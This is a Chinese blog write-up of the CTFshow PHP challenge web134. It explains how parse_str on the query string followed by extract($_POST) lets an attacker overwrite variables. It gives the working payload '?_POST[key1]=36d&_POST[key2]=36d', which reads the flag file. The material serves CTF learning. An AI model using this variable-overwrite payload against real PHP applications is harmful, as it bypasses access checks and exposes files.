CTFshow php特性 web134

最新推荐文章于 2024-05-06 11:05:52 发布
最新推荐文章于 2024-05-06 11:05:52 发布
阅读量420 收藏 1
点赞数
分类专栏: CTFshow 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/121993806
版权

目录

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-10-13 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-14 23:01:06

*/

highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) {
    die("nonononono");
}
@parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
if($key1 == '36d' && $key2 == '36d') {
    die(file_get_contents('flag.php'));
}

思路

这题很简单,考点还是变量覆盖

本地测试一下

parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
var_dump(get_defined_vars());

我们传入?_POST[a]=1&_POST[b]=12

经过parse_str($_SERVER['QUERY_STRING'])

post中存在了array(2) { ["a"]=> string(1) "1" ["b"]=> string(2) "12" }
在这里插入图片描述
经过 extract($_POST);

在这里插入图片描述
成功创建变量a,b并覆盖值

题解

?_POST[key1]=36d&_POST[key2]=36d

``

总结

水题

Kradress
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web入门 php特性 web131-web135
m0_62207170的博客
10-05 569
ctfshow web入门 php特性 web131-web135
CTFSHOW WEB_AK赛
羽的博客
07-31 2984
签到_观己 既然是签到,那我们就去猜一下flag的位置以及文件名 payload:file=/flag.txt 结束 如果猜不到呢,我们只能另寻他法了 1、尝试用伪协议中的data(具体伪协议的用法可参考https://blog.csdn.net/nzjdsds/article/details/82461043)发现allow_url_include没有开启。 2、让file=/var/log/nginx/access.log发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话。(其中日志中有客
ctfshow web入门 php特性 web123--web139
2301_81040377的博客
04-06 819
web133一样的东西但是我们的grep被过滤了,所以得思考一下怎么才行,但是反斜杠引号什么的没过滤,就可以用来绕过。拼接一下ctfshow{25b598bc-5a5b-4baf-a23e-2c4e9dea9d8f}必须传CTF_SHOW,CTF_SHOW.COM 不能有fl0g。就可以绕过对**isset($fl0g)**的判断,用+代表空格。先点击左边的获得域名,然后传参之后再点击右边的刷新结果。他这里对这个就讲的特别详细了,我抄一下。然后我们就可以进行类似的构造。就用argv的方法来写。
ctfshow web13-14
qq_61988806的博客
12-12 1031
ctfshow web13-14 文件上传的题 想办法搞到源码 常见得到源码的方法 .bak .git .hg 这里使用.bak得到源码 下载得到源码
CTFshow php特性 web101
Kradress的博客
12-14 733
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-22 00:26:48 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.php"); //fl
PHP特性(网友根据ctfshow整理)1
08-03
3.== 弱类型与路径问题 5.三目运算符的理解+变量覆盖 8.and与&&的区别+反射类ReflectionClass的使用 3.== 弱类型与路径问题
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
PHP 在字符中找出重复次数最多的字符
最新发布
zzjnlwb的专栏
05-06 153
应该也还有其他很多办法!等我遇到了再更新本篇!我感觉这是最简单的一种办法!
Debian 德比安 Nginx + PHP + MySql + beanstalkd + Redis + Node.js
HzqGhost's Blog
04-29 685
网卡模式选择桥接 mirrors.163.com阿里镜像源DeBian 安装软件选择时勾选上apt updateapt install sudo #安装 sudousermod -aG sudo username #添加普通账号到 sudo让 root 可以 SSH配置文件 /etc/ssh/sshd_config找到 PermitRootLogin 选项 并将其值修改为重启ssh先在 VirtualBox 上添加好。
PHP算命源码_最新测算塔罗源码_可以运营
吉他程序员的博客
04-30 384
八字精批、事业财运、姓名分析、宝宝起名、公司测名、姓名配对、综合详批、姻缘测算、牛年感情、PC版测算、八字合婚、紫微斗数、鼠年运程、月老姻缘、许愿祈福、号码解析、塔罗运势、脱单占卜、感情继续、脱单占卜、塔罗爱情、心理有你、能否复合、暗恋对象、是否分手、爱着别人、大师服务(包含多项功能)共计30余项功能,全网功能全,完善的版本。
[Meachines][Hard]Analysis
05-03 986
#Kerberos#DC#Arjun#LDAP Injection#Kerbrute#P0wnyshell#evil-winrm#DLL Hijack#Snort
windows11安装nginx
xiaobai_cpp的博客
04-30 297
5.网络->侦听端口,查看nginx侦听的端口,这里是90端口。1.解压nginx安装包到没有中文的目录。3.任务管理器查看是否有nginx进程。4.任务管理器->性能->资源监视器。2.双击运行nginx.exe。
远程桌面的端口配置与优化
day3ZY的博客
04-29 540
然而,随着网络攻击的增加,确保远程桌面连接的安全性变得尤为重要。通过更改远程桌面的默认端口并采取其他安全措施,管理员可以大大提高远程桌面连接的安全性,从而保护企业的数据和资源。4. 在“本地设备和资源”窗口中,点击“远程端口”旁边的“下拉箭头”,然后选择一个不同的端口号。确保只有必要的计算机和用户可以访问新的远程桌面端口。1. 打开“开始”菜单,搜索“远程桌面连接”,并打开它。保持远程桌面服务和操作系统的更新,以获取最新的安全补丁。2. 在“远程桌面连接”窗口中,点击“显示选项”。
laravel rabbitmq 队列
昊喵喵博士
04-30 593
解决方案,这是一个来自.env文件的问题。将登录详细信息的名称从RABBITMQ_LOGIN更改为RABBITMQ_USER。
用龙梦迷你电脑福珑2.0做web服务器
shencz2000的专栏
05-02 205
用龙梦迷你电脑福珑2.0上做web服务器是可行的。已将一个网站源码放到该电脑,在局域网里可以访问网站页面。以及通过花生壳软件,也可以在外网访问该内网服务器网站页面。该电脑的操作系统属于LAMP。在该电脑上安装了Loongnix 1.0。能顺利完成安装web服务器所需要的软件。详情请查看我写的上一篇文章。
ctfshow php特性
08-06
引用提到了"ctfshow-php特性-超详解(干货)",它是一篇关于ctfshow php的博客文章。引用和引用则展示了两段关于ctfshow php特性的代码。其中引用是一段关于RCE(远程代码执行)的代码,而引用是一段关于反射类和命令执行的代码。这些引用都提到了ctfshow php特性,但并没有详细说明这些特性是什么。由于没有更多的上下文信息,我无法提供更详细的答案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值